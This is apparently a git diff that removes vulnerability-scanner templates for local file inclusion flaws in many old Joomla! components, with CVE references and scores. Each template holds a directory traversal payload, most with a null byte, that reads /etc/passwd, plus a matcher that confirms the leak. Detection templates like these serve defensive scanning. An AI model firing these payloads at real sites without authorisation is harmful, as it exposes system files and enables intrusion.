- http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2010-0982
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0985
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0985
|
||||
- http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560
|
||||
- http://www.exploit-db.com/exploits/10948
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2010-0985
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1056
|
||||
- http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/
|
||||
- http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 6.8
|
||||
cve-id: CVE-2010-1056
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1081
|
||||
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1081
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1217
|
||||
- http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
|
||||
- http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2010-1217
|
||||
cwe-id: CWE-22
|
||||
tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1219
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1219
|
||||
- http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952
|
||||
- http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 6.8
|
||||
cve-id: CVE-2010-1219
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1302
|
||||
|
||||
info:
|
||||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1302
|
||||
- http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
|
||||
- http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1302
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2010,joomla,lfi,graph
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1304
|
||||
|
||||
info:
|
||||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1304
|
||||
- http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174
|
||||
- http://www.exploit-db.com/exploits/11998
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1304
|
||||
cwe-id: CWE-22
|
||||
tags: cve2010,joomla,lfi,status,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1305
|
||||
|
||||
info:
|
||||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1305
|
||||
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
|
||||
- http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1305
|
||||
cwe-id: CWE-22
|
||||
tags: joomla,lfi,edb,cve,cve2010
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1306
|
||||
|
||||
info:
|
||||
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12058
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1306
|
||||
- http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/
|
||||
- http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2010-1306
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1307
|
||||
|
||||
info:
|
||||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1307
|
||||
- http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/
|
||||
- http://www.vupen.com/english/advisories/2010/0806
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1307
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2010-1308
|
||||
|
||||
info:
|
||||
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12066
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1308
|
||||
- http://www.vupen.com/english/advisories/2010/0809
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1308
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1312
|
||||
|
||||
info:
|
||||
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12077
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1312
|
||||
- http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1312
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1313
|
||||
|
||||
info:
|
||||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1313
|
||||
- http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
|
||||
- http://www.exploit-db.com/exploits/12082
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
|
||||
cve-id: CVE-2010-1313
|
||||
cwe-id: CWE-22
|
||||
cvss-score: 4.3
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1314
|
||||
|
||||
info:
|
||||
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12086
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1314
|
||||
- http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1314
|
||||
cwe-id: CWE-22
|
||||
tags: lfi,edb,packetstorm,cve,cve2010,joomla
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-1315
|
||||
|
||||
info:
|
||||
name: Joomla! Component webERPcustomer - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11999
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1315
|
||||
- http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-1315
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue